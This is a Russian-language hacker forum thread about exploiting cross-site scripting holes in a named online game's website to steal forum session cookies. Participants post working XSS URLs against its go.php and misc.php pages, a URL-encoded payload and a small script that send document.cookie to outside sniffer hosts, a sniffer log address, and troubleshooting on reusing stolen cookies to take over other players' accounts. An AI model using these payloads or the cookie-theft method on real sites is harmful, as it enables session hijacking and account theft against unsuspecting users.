вощем давненько нашол что в энтой игре юзается Voc чат
в следствии чего имеется XSS дыра
_http://east.enigma-planet.com/go.php?url=javascript:alert('up')
юзая которую можно перехватить ID сессии на форуме.
Только вот какая трабла после подскановки куков я напрочь не могу азйти в игру-((

А там есть session id? (в куках) Если есть, то не вставляй её... А там же еще phpBB стоит...

2 bul.666
всё есть всё вставляю только чёт не прокатывает
если нифпадлу попробуй сделать.. всё с нуля
___
_www.enigma-planet.com/
рег у них приметивный даж подтверждать не заставляют

У тя Скрипт работает только при нажатии попробуй этот:

http://east.enigma-planet.com/go.php?url="><script>alert()</script><noscript>


Тока постоянно обновляется... На снифак кинуть инфу хватит =)

Воть тебе нормальный CSS =)

http://east.enigma-planet.com/misc.php?state=start_info&r_name=%22%3E%3Cscript%3Ealert()%3C/script%3E%3Cnoscript%3E

норм CSS у меня есть ->
http://east.enigma-planet.com/go.php?url=go.php?url=%6a%61%76%61%73%63%72%69%70% 74%3a%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69 %6f%6e%2e%72%65%70%6c%61%63%65%28%27%68%74%74%70%3 a%2f%2f%61%6e%74%69%63%68%61%74%2e%72%75%2f%63%67% 69%2d%62%69%6e%2f%73%2e%6a%70%67%3f%27%2b%64%6f%63 %75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b
трабла именно с подстановкой куков

У мя все работает...

Попробуй так...

Создай файл гденить на сервере с содержанием:

img = new Image();
img.src = "http://lamer-lol.h10.ru/snif/foto.php?"+document.cookie;

Тут на мой сниффер... =) И назави его например sniff...

Далле твойа xss будет выглядить так:

http://east.enigma-planet.com/misc.php?state=start_info&r_name="><script src=http://lamer.xost.ru/sniff>&nbsp;</script><noscript>

Логи тут:

http://lamer-lol.h10.ru/snif/log.txt

=)

ты попробуй именно куки подставить и как фатк спереть там акк у когонить
куки у меня нормуль прутся.. но када всё в броузе всё подставляю происходит какая то трабла и я не могу в игру зайти